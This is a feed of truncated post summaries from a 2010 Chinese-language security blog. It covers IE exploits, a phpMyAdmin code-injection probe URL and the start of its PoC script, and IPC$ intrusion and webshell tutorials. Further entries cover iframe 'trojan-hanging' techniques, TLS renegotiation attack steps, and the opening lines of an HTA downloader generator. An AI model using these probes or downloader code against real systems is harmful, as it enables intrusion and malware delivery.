href='http://mycck.blogspot.com/2010/07/office-outlook-2010-google-canendar.html' title='解決 Office Outlook 2010 與 Google Canendar Sync 同步問題'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-6250500735673760224</id><published>2010-07-19T02:19:00.001+08:00</published><updated>2010-07-19T02:19:35.082+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='挑戰'/><category scheme='http://www.blogger.com/atom/ns#' term='惡意程式'/><category scheme='http://www.blogger.com/atom/ns#' term='社交工程'/><title type='text'>重要文件下載</title><summary type='text'>如果我說附件裡面是重要的政府文件及微軟作業系統的原始碼文件    你相信嗎?你敢開啟嗎?!  </summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/6250500735673760224'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/6250500735673760224'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2010/07/blog-post.html' title='重要文件下載'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-181745373462682059</id><published>2010-05-26T15:39:00.001+08:00</published><updated>2010-05-26T15:42:24.417+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='IE'/><title type='text'>今天的 windows update</title><summary type='text'>今天發現微軟又出了補丁，安裝後發現IE的連線分頁不見了  頂你的肺，那要怎麼設proxy咧...  修復方法：   修改機碼(regedit)    HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel    將ConnectionsTab數值資料改為0  不過在其它機器上測試，並不會有連線分頁不見的情況..  怪事年年有，今天特別多  </summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/181745373462682059'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/181745373462682059'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2010/05/windows-update.html' title='今天的 windows update'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-7310846681752239709</id><published>2010-03-25T14:00:00.001+08:00</published><updated>2010-03-25T14:00:34.781+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='惡意程式'/><title type='text'>你被出賣了嗎?</title><summary type='text'>安裝軟體請小心~  看看這則吧  </summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/7310846681752239709'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/7310846681752239709'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2010/03/blog-post_25.html' title='你被出賣了嗎?'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-5510941963417511274</id><published>2010-03-15T10:35:00.001+08:00</published><updated>2010-03-15T10:35:48.038+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='IE'/><category scheme='http://www.blogger.com/atom/ns#' term='exploit'/><category scheme='http://www.blogger.com/atom/ns#' term='metasploit'/><title type='text'>Microsoft Internet Explorer iepeers.dll use-after-free exploit (metasploit)</title><summary type='text'>本文來自:這裡  A new Microsoft Internet Explorer 0day exploit has been found circulating in-the-wild. According to Microsoft, there are targeted attacks attempting to use this vulnerability. Microsoft published a security advisory for this vulnerability here:   Microsoft Security Advisory (981374): Vulnerability in Internet Explorer Could Allow Remote Code Execution  The vulnerability is a </summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/5510941963417511274'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/5510941963417511274'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2010/03/microsoft-internet-explorer-iepeersdll.html' title='Microsoft Internet Explorer iepeers.dll use-after-free exploit (metasploit)'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-5897369100678696368</id><published>2010-03-10T15:57:00.001+08:00</published><updated>2010-03-10T15:57:09.378+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='隨語'/><title type='text'>聽研討會肚子餓想吃魷魚羮的心得</title><summary type='text'>很多人在談論資訊安全,很喜歡拿房子當作範例   也經常拿談論他們的產品,如何能使這間房子更安全    常聽見的不外乎在門窗裝上監測器,藉此感知有無遭受入侵   但顯少有聽到創意的想法   例如：打電話騷擾你算不算入侵,從窗戶看到你淋浴的畫面算不算入侵   但這些廠商跟他們的工具可以偵測到這些問題嗎?   很多人在探討資安未來的趨勢    例如cloud computing很紅,就先冠上個安全疑慮之名,認為自己走在時代的尖端    這個社會不乏自我感覺良好的人,打嘴泡的安全專家也很多    研討會講的還是那些陳年的舊夢   一味地在倡導資安防護的嚴重性,又常以個資法來恫嚇大家   買了我的產品做一下掃描,有發現問題就修,你就不用怕被告    (這好像是在收保護費)    猛甲上有演到,當你去別人的地盤說你要買魷魚羮,又說是廟口要的    這樣你會被追殺,也沒有魷魚羮可吃  </summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/5897369100678696368'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/5897369100678696368'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2010/03/blog-post_10.html' title='聽研討會肚子餓想吃魷魚羮的心得'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-6263222981217881676</id><published>2010-03-10T15:23:00.001+08:00</published><updated>2010-03-10T15:23:53.892+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='隨語'/><title type='text'>資訊安全?</title><summary type='text'>最近地震頻傳,總是會有人拿來多做文章,若純粹開開玩笑,則無傷大雅   一旦成為流言,那就很麻煩了    你怎麼判斷你聽到的資訊是安全的呢?     下面那則消息被放在全台最大的BBS站上,而該站的上站人數平均在8,9萬間    若該站會員看了此消息,以鵝傳鵝,當消息越滾越大時    所以到時候會有人賣股票買黃金(保值)    結論是趁現在多買些黃金回家放吧編輯  [分享] 一個學長軍中同梯弟兄的預言  </summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/6263222981217881676'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/6263222981217881676'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2010/03/blog-post.html' title='資訊安全?'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-96663947324031672</id><published>2010-03-09T20:04:00.002+08:00</published><updated>2010-03-10T12:13:43.046+08:00</updated><title type='text'>[congratulations]kamisan</title><summary type='text'>Virtual Biomedical Management LAB  恭禧kamisan 通過口試；獲得生醫工程研究所碩士學位；資科工博士班入學  just kidding,別查我IP</summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/96663947324031672'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/96663947324031672'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2010/03/congratulationskamisan.html' title='[congratulations]kamisan'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-1233037255840078496</id><published>2010-03-09T19:04:00.001+08:00</published><updated>2010-03-09T19:04:13.517+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='IE'/><category scheme='http://www.blogger.com/atom/ns#' term='exploit'/><title type='text'>IE wshom.ocx (Run) ActiveX Remote Code Execution</title><summary type='text'>也是蠻有名的IE弱點,可以執行任意指令  </summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/1233037255840078496'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/1233037255840078496'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2010/03/ie-wshomocx-run-activex-remote-code.html' title='IE wshom.ocx (Run) ActiveX Remote Code Execution'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-4880359045727931750</id><published>2010-03-09T18:05:00.001+08:00</published><updated>2010-03-09T19:03:11.155+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='IE'/><category scheme='http://www.blogger.com/atom/ns#' term='PoC'/><title type='text'>Internet Explorer ‘winhlp32.exe’ ‘MsgBox()’ Remote Code Execution Vulnerability</title><summary type='text'>蠻有名的IE弱點(F1),可以執行遠端惡意程式  想玩嗎?  </summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/4880359045727931750'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/4880359045727931750'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2010/03/internet-explorer-winhlp32exe-msgbox.html' title='Internet Explorer ‘winhlp32.exe’ ‘MsgBox()’ Remote Code Execution Vulnerability'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-6119006970630104405</id><published>2010-03-09T16:40:00.001+08:00</published><updated>2010-03-09T17:19:49.840+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='phpMyAdmin'/><category scheme='http://www.blogger.com/atom/ns#' term='rfi'/><title type='text'>最近的攻擊RFI</title><summary type='text'>每天都會大概看一下網站的log  發現195.159.180.18一直在測試phpmyadmin的一個RFI弱點  可能是新型的漏洞吧已經是去年的漏洞了，大家若有使用phpmyadmin請更新  漏洞驗證方式：   http://website/phpmyadmin/config/config.inc.php?p=[evalcode]  如果上面那行執行成功，代表你的伺服器可能被入侵了  下面是phpmyadmin vulnerability exploit   phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit  #!/bin/bash    # CVE-2009-1151: phpMyAdmin '/scripts/setup.php' PHP Code Injection RCE PoC v0.11     # by</summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/6119006970630104405'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/6119006970630104405'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2010/03/rfi.html' title='最近的攻擊RFI'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-6616401797124389986</id><published>2010-03-09T16:31:00.001+08:00</published><updated>2010-03-09T16:31:52.426+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='ipc'/><category scheme='http://www.blogger.com/atom/ns#' term='net'/><title type='text'>一份詳盡的IPC$入侵資料</title><summary type='text'>創建時間：2003-03-16   文章屬性：原創    文章來源：菜菜鳥社區http://ccbirds.yeah.net    文章提交：iqst (papabang_at_qingdaonews.com)    [ccbirds入門級教程]--各個擊破1--ipc$入侵    一 嘮叨一下：    網上關於ipc$入侵的文章可謂多如牛毛,而且也不乏優秀之作,攻擊步驟甚至可以說已經成為經典的模式,因此也沒人願意再把這已經成為定式的東西拿出來擺弄.    不過話雖這樣說,但我個人認為這些文章講解的並不詳細,對於第一次接觸ipc$的菜鳥來說,簡單的羅列步驟並不能解答他們的許多迷惑(你隨便找一個hack論壇搜一下ipc,看存在的疑惑有多少).    因此我寫了這篇相當於解惑的教程.想把一些容易混淆,容易迷惑人的問題說清楚,讓大家不要總徘徊在原地!如果你看完這篇帖子仍有疑問,請馬上回復!</summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/6616401797124389986'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/6616401797124389986'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2010/03/ipc.html' title='一份詳盡的IPC$入侵資料'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-5452678737360208450</id><published>2010-03-08T14:39:00.001+08:00</published><updated>2010-03-08T14:39:28.804+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='隨語'/><category scheme='http://www.blogger.com/atom/ns#' term='finger print'/><title type='text'>finger print 隨寫</title><summary type='text'>其實finger print原理很簡單,重點在於夠不夠細心就線索去推敲並驗證猜想取得驗證結果?       電影"情聖"中周星馳為潛入豪宅而計誘屋主出門，便依屋主的興趣弄了兩張票    電影"福爾摩斯"在華生對事件的描述中就可以猜出犯人及其動機   倘若你知道某戶家裡住人卻無法知道屋主資訊,在不考慮被抓走的情況下,最直接的方式就是打開門進去看,或喬裝pizza外送人員進行確認,但一般而言我們會就外在可及的元素進行解析   例如外牆、鞋櫃、信箱、門、窗戶、生活作習..    透過外牆的色系,如粉色系就有?%機率屋主是女性,而外牆掛飾也可窺見一斑    而鞋櫃的男女鞋款、信箱信件中稱謂、大門款式、窗戶窗簾的款式、幾點熄燈就寢、晾乾的衣物,都是提供分析很好的數據，提供的情報越多所分析的資訊就越精確,再而便可針對我們的猜測進行驗證,如敲門、打電話、假警報..   因此探知作業系統,</summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/5452678737360208450'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/5452678737360208450'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2010/03/finger-print.html' title='finger print 隨寫'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-2649963330836512468</id><published>2010-01-26T14:23:00.001+08:00</published><updated>2010-01-26T14:23:51.216+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Sikuli'/><title type='text'>[Sikuli]截圖scripts</title><summary type='text'>作者blog  http://blog.vgod.tw/    </summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/2649963330836512468'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/2649963330836512468'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2010/01/sikuliscripts.html' title='[Sikuli]截圖scripts'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://lh4.ggpht.com/_q2SxxmLWIiM/S16KdrYbsAI/AAAAAAAABJE/-ggsm7VfFO0/s72-c/video4543e1c97388%5B2%5D.jpg?imgmax=800' height='72' width='72'/></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-1804395187401633381</id><published>2010-01-25T14:32:00.001+08:00</published><updated>2010-01-25T14:32:13.953+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='隨語'/><title type='text'>你耍我啊! You no good, You no good!</title><summary type='text'>相信不少人或多或少看過、聽說過賀歲大片志玲刺陵  沒錯!衝著波多野結衣的名氣下，不免俗的我也詳詳實實地看完了  劇情沒什麼好介紹的，總而言之就是...  朱董推翻了因果論，著實為本世紀最偉大的物理學家!!  </summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/1804395187401633381'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/1804395187401633381'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2010/01/you-no-good-you-no-good.html' title='你耍我啊! You no good, You no good!'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-7309030320711593044</id><published>2010-01-15T15:35:00.001+08:00</published><updated>2010-01-15T15:35:48.861+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='webshell'/><title type='text'>WebShell三劍客（ASPXSPY、PHPSPY、JSPSPY）</title><summary type='text'>by:angel  以前有phpspy，又有aspxspy，現在又有jspspy，不僅僅名字一樣。連範本都是一樣的。。  ASPSPY：http://www.rootkit.net.cn/article.asp?id=132  JSPSPY：http://www.forjj.com/?action=show&amp;id=138  和BIN老早就認識了。  最近認識Ninty，居然還是個90後。後生可畏啊！自己都汗顏。  不過細細算下來。我似乎是初中初三開始接觸網絡安全的。那時候我是15歲。現在我都26了！都11年了。為什麼人家學東西那麼快。我這麼大的人了還是沒有什麼長進。一個勁玩什麼車哦。。。想想自己真是可悲啊。站黑得再多有什麼鳥用。已經是名存實亡的angel了。  </summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/7309030320711593044'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/7309030320711593044'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2010/01/webshellaspxspyphpspyjspspy.html' title='WebShell三劍客（ASPXSPY、PHPSPY、JSPSPY）'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-4548771504518085146</id><published>2010-01-15T15:33:00.001+08:00</published><updated>2010-01-15T15:33:17.386+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='encoder'/><title type='text'>蝌蚪解碼</title><summary type='text'>http://c.goozo.net/  </summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/4548771504518085146'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/4548771504518085146'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2010/01/blog-post_15.html' title='蝌蚪解碼'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-9024077647027052534</id><published>2010-01-15T15:30:00.001+08:00</published><updated>2010-01-15T15:30:18.163+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Flash'/><title type='text'>Flash應用安全規範</title><summary type='text'>Author:jianxin [80sec]    EMail: jianxin#80sec.com    Site: http://www.80sec.com    Date: 2009-07-25    From: http://www.80sec.com/release/flash-security.txt  [ 目錄 ]  0×00 前言   0×01 安全的服務端flash安全性原則    0×02 安全的用戶端flash安全規範    0×03 flash安全的checklist  0×00 前言  flash作為一款流覽器的協力廠商外掛程式，是對流覽器功能的延伸，已經是web必不可少的元素。但是這種延伸必然帶來不安全的因素，相比於安全性已經得到磨 練的流覽器來說，flash絕對是用戶端安全的一個軟肋（包括在比較神秘的漏洞挖掘領域，也是這個觀點），同樣flash</summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/9024077647027052534'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/9024077647027052534'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2010/01/flash.html' title='Flash應用安全規範'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-517861817637300246</id><published>2010-01-15T15:29:00.001+08:00</published><updated>2010-01-15T15:29:04.231+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='ssl'/><category scheme='http://www.blogger.com/atom/ns#' term='tls'/><title type='text'>Renegotiating TLS Attack</title><summary type='text'>   作者：雲舒  摘要：sowhat大牛今天介紹了國外一 種的新的針對TLS/SSL3.0的攻擊方式，貌似關注的人不多，所以我特地看了一下那個PDF，稍微八 卦一下。  這個攻擊是非常巧妙的，主要是利用了TLS/SSL 3.0重置加密演算法機制和HTTP協定請求頭的key、value結構，實現了多次資料的組合以完成自己想要的請求，從攻擊效果來看有點類似CSRF攻擊。主要步驟如下：  1. 攻擊者連接目標網站完成SSL握手稱為session 1，並發送GET /adduser.jsp?u=yunshu&amp;passwd=123 HTTP/1.1\r\nFVCK: 之類的資料包。  2. 攻擊者劫持被攻擊者訪問目標網站的資料，在session 1中轉發被攻擊者與目標伺服器之間的SSL握手，被攻擊者和目標伺服器完成握手稱為session 2。  4. 目標網站和被攻擊者通過攻擊者的轉發完成握手，</summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/517861817637300246'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/517861817637300246'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2010/01/renegotiating-tls-attack.html' title='Renegotiating TLS Attack'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-4995156102825308201</id><published>2010-01-15T15:26:00.001+08:00</published><updated>2010-01-15T15:26:57.055+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='掛馬'/><title type='text'>掛馬的兩個新方法（11期駭客手冊稿子）</title><summary type='text'>作者：lcx  這裡只做技術討論，不做具體危害的事。如果你要用我的方法去做，我也沒辦法，呵呵。關於掛馬，基本上是在網頁原來的代碼裡載入一個iframe。關於載入iframe，我以前的文章寫過幾種，這篇文章裡再提兩個新方法吧。  一、利用htc檔來載入iframe。   百度百寇里對htc檔的解釋為：從5.5版本開始，Internet Explorer（IE）開始支持Web 行為的概念。這些行為是由尾碼名為.htc的指令檔描述的，它們定義了一套方法和屬性，程式師幾乎可以把這些方法和屬性應用到HTML頁面上的任何元素 上去。Web 行為是非常偉大的因為它們允許程式師把自訂的功能“連接”到現有的元素和控制項，而不是必須讓用戶下載二進位檔案（例如ActiveX 控制項）來完成這個功能。Web 行為還是推薦的擴展IE物件模型和控制項集的方法。微軟在它的開發者網站上的DHTML </summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/4995156102825308201'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/4995156102825308201'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2010/01/11.html' title='掛馬的兩個新方法（11期駭客手冊稿子）'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-3392094789159413037</id><published>2010-01-15T15:25:00.001+08:00</published><updated>2010-01-15T15:25:03.406+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vpn'/><category scheme='http://www.blogger.com/atom/ns#' term='hta'/><title type='text'>vpn連接程式hta 版</title><summary type='text'>在同目錄下建立ip.txt   ip.txt裡是vpn的ip列表，一行一個，可以在每行里加說明    複製IP會自動粘貼到ip框裡，是否成功的話，請看ip顯示  作者：lcx  &lt;HTA:APPLICATION  ID="MySampleHTA"  Caption="yes"  SCROLL="auto"  border="none"  borderStyle="static"  SINGLEINSTANCE="yes"  maximizebutton="no"  BORDER="no"  icon="dxdiag.exe"&gt;  &lt;title&gt;vpn 連接程式 hta版&lt;/title&gt;  &lt;style&gt;  body  {  font-size:12;  BACKGROUND: #DADADA;  margin-left:5;  }  input  {  width:50;  </summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/3392094789159413037'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/3392094789159413037'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2010/01/vpnhta.html' title='vpn連接程式hta 版'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-9kxFe5Es5qI/AAAAAAAAAAI/AAAAAAAABVQ/RXjnB0M-8yg/s512-c/photo.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6206663558531568736.post-4905221274309659240</id><published>2010-01-15T15:24:00.001+08:00</published><updated>2010-01-15T15:24:05.809+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='downloader'/><category scheme='http://www.blogger.com/atom/ns#' term='hta'/><title type='text'>XMLDOM下載者生成器(xmldown.hta)</title><summary type='text'>作者：lcx  以下代碼保存成hta檔，可生成js和vbs下載者  &lt;HTA:APPLICATION  ID="xmldown"  Caption="yes"  SCROLL="auto"  border="none"  borderStyle="static"  SINGLEINSTANCE="yes"  maximizebutton="no"  BORDER="no"  icon="dxdiag.exe"&gt;  &lt;script language=vbs&gt;  Sub Window_onLoad  window.resizeTo screen.width/1.6,screen.height/3  window.moveTo 200,200  End Sub  Sub CreateXml(path,File)  Set objStream = CreateObject("</summary><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/4905221274309659240'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6206663558531568736/posts/default/4905221274309659240'/><link rel='alternate' type='text/html' href='http://mycck.blogspot.com/2010/01/xmldomxmldownhta.html' title='XMLDOM下載者生成器(xmldown.hta)'/><author><name>C.C. Kao</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' 